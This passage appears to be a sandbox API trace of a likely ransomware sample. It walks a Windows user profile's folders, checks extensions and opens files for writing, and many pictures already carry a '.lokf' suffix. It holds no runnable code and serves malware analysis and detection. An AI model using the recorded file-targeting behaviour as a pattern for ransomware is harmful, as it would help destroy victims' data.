lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b535f0, ftCreationTime.dwHighDateTime=0x1d4c620, ftLastAccessTime.dwLowDateTime=0xf05a3ac0, ftLastAccessTime.dwHighDateTime=0x1d4c8e8, ftLastWriteTime.dwLowDateTime=0x20717c70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x9b25, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IIQQGpJ.gif.lokf", cAlternateFileName="IIQQGP~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IIQQGpJ.gif.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74411580, ftCreationTime.dwHighDateTime=0x1d4c73a, ftLastAccessTime.dwLowDateTime=0x73ade950, ftLastAccessTime.dwHighDateTime=0x1d4d116, ftLastWriteTime.dwLowDateTime=0x2073ddd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8b1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lY0DCvr2.bmp.lokf", cAlternateFileName="LY0DCV~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lY0DCvr2.bmp.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb69c2b70, ftCreationTime.dwHighDateTime=0x1d4ccd7, ftLastAccessTime.dwLowDateTime=0x17ff2de0, ftLastAccessTime.dwHighDateTime=0x1d4d0e3, ftLastWriteTime.dwLowDateTime=0x2073ddd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5eac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mjvWTIfK-ga.gif.lokf", cAlternateFileName="MJVWTI~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mjvWTIfK-ga.gif.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94c82620, ftCreationTime.dwHighDateTime=0x1d4c5e3, ftLastAccessTime.dwLowDateTime=0x94bfa4c0, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0x20763f30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x18e7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OkL4HKnkSYSJIwPNsR_.png.lokf", cAlternateFileName="OKL4HK~1.LOK")) returned 1 [0148.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OkL4HKnkSYSJIwPNsR_.png.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0x21004ef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21004ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pt3T5YLjsfWTS8bTn", cAlternateFileName="PT3T5Y~1")) returned 1 [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ca7a240, ftCreationTime.dwHighDateTime=0x1d4ce0d, ftLastAccessTime.dwLowDateTime=0x539880a0, ftLastAccessTime.dwHighDateTime=0x1d4d2f9, ftLastWriteTime.dwLowDateTime=0x2078a090, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x158f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIK1-BUGPQEVJirKz6N.jpg.lokf", cAlternateFileName="RIK1-B~1.LOK")) returned 1 [0148.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RIK1-BUGPQEVJirKz6N.jpg.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d70800, ftCreationTime.dwHighDateTime=0x1d4d1f6, ftLastAccessTime.dwLowDateTime=0x8e210db0, ftLastAccessTime.dwHighDateTime=0x1d4c77c, ftLastWriteTime.dwLowDateTime=0x207b01f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x694a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rZNT8ree-9bG.bmp.lokf", cAlternateFileName="RZNT8R~1.LOK")) returned 1 [0148.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rZNT8ree-9bG.bmp.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6823c0, ftCreationTime.dwHighDateTime=0x1d4d3e4, ftLastAccessTime.dwLowDateTime=0x92bdb960, ftLastAccessTime.dwHighDateTime=0x1d4d387, ftLastWriteTime.dwLowDateTime=0x207b01f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xd330, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSPFwFmW70A.png.lokf", cAlternateFileName="TSPFWF~1.LOK")) returned 1 [0148.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TSPFwFmW70A.png.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5db5ed0, ftCreationTime.dwHighDateTime=0x1d4d18b, ftLastAccessTime.dwLowDateTime=0x1f2e2ea0, ftLastAccessTime.dwHighDateTime=0x1d4d466, ftLastWriteTime.dwLowDateTime=0x207d6350, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x10ba9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="urTk_7SAl.png.lokf", cAlternateFileName="URTK_7~1.LOK")) returned 1 [0148.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\urTk_7SAl.png.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf65960, ftCreationTime.dwHighDateTime=0x1d4c5ba, ftLastAccessTime.dwLowDateTime=0x61fdf110, ftLastAccessTime.dwHighDateTime=0x1d4d4ad, ftLastWriteTime.dwLowDateTime=0x207fc4b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x107ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V8xM.jpg.lokf", cAlternateFileName="V8XMJP~1.LOK")) returned 1 [0148.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8xM.jpg.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc0430, ftCreationTime.dwHighDateTime=0x1d4d2e1, ftLastAccessTime.dwLowDateTime=0x3996550, ftLastAccessTime.dwHighDateTime=0x1d4cc33, ftLastWriteTime.dwLowDateTime=0x207fc4b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x183eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WX2M.gif.lokf", cAlternateFileName="WX2MGI~1.LOK")) returned 1 [0148.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WX2M.gif.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif.lokf", cAlternateFileName="Y_DZ9Y~1.LOK")) returned 1 [0148.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y_Dz9ypir.gif.lokf") returned=".lokf" [0148.243] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif.lokf", cAlternateFileName="Y_DZ9Y~1.LOK")) returned 0 [0148.243] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.243] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.243] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0148.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.244] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.244] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.244] PathFindFileNameW (pszPath="") returned="" [0148.244] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif.lokf", cAlternateFileName="Y_DZ9Y~1.LOK")) returned 0xffffffff [0148.244] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.244] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0148.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.244] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.244] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.244] PathFindFileNameW (pszPath="") returned="" [0148.244] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif.lokf", cAlternateFileName="Y_DZ9Y~1.LOK")) returned 0xffffffff [0148.244] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.244] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0148.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.244] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.245] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.245] PathFindFileNameW (pszPath="") returned="" [0148.245] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.245] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.245] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0148.245] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0148.245] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.245] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.245] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.245] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0148.245] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.245] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.245] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.245] PathFindFileNameW (pszPath="") returned="" [0148.245] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.245] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.245] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0148.246] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0148.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0148.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.246] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0148.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0148.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.246] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0148.246] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.246] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.246] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.246] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0148.246] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.246] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.246] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.246] PathFindFileNameW (pszPath="") returned="" [0148.246] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0148.246] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.247] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.247] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0148.247] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.247] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.247] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.247] PathFindFileNameW (pszPath="") returned="" [0148.247] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0148.247] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.247] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.247] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0148.247] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.247] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.247] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.247] PathFindFileNameW (pszPath="") returned="" [0148.247] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0148.247] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.247] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.247] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0148.247] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.248] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.248] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.248] PathFindFileNameW (pszPath="") returned="" [0148.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, 